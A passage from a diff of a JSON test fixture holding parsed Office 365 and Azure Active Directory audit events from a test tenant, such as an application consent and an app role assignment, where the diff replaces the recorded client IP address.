application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -24592,9 +24592,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { @@ -24829,7 +24829,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -24859,9 +24859,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { @@ -25096,7 +25096,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -25126,9 +25126,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { @@ -25357,7 +25357,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\